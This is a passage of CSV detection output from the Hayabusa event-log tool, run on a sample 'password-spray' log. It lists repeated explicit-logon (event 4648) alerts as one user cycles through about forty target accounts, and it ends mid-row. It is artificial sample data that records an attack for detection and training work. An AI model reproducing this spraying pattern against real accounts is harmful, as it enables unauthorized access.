2019-05-01 04:28:26.529 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:27.607 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:28.691 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:29.753 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:30.838 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:31.910 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:32.983 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:34.067 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:35.146 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:36.239 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:37.334 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:38.403 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:39.463 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:40.530 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:41.608 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:42.669 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:43.731 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:44.801 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:45.880 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:46.969 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:48.042 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:49.108 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:50.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:51.239 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:52.302 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:53.366 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:54.441 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:55.503 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:56.579 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:57.650 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:58.722 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:59.800 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:00.872 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:01.934 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:02.995 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:04.075 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:05.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:06.238 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:07.308 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:08.370 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:09.433 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:10.523 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:11.590 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:12.649 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:13.722 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:14.787 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:15.846 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:16.940 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:18.019 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:19.076 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:20.162 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:21.257 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:22.327 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:23.410 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:24.477 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:25.557 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:26.628 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:27.690 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:28.763 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:29.837 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:30.921 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:31.996 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:33.058 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:34.138 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:35.199 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:36.266 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:37.375 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:38.439 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:39.499 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:40.560 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:41.637 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:42.734 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:43.795 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:44.875 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:45.951 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:47.017 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:48.096 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:49.176 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:50.264 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:51.340 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:52.405 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:53.466 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: 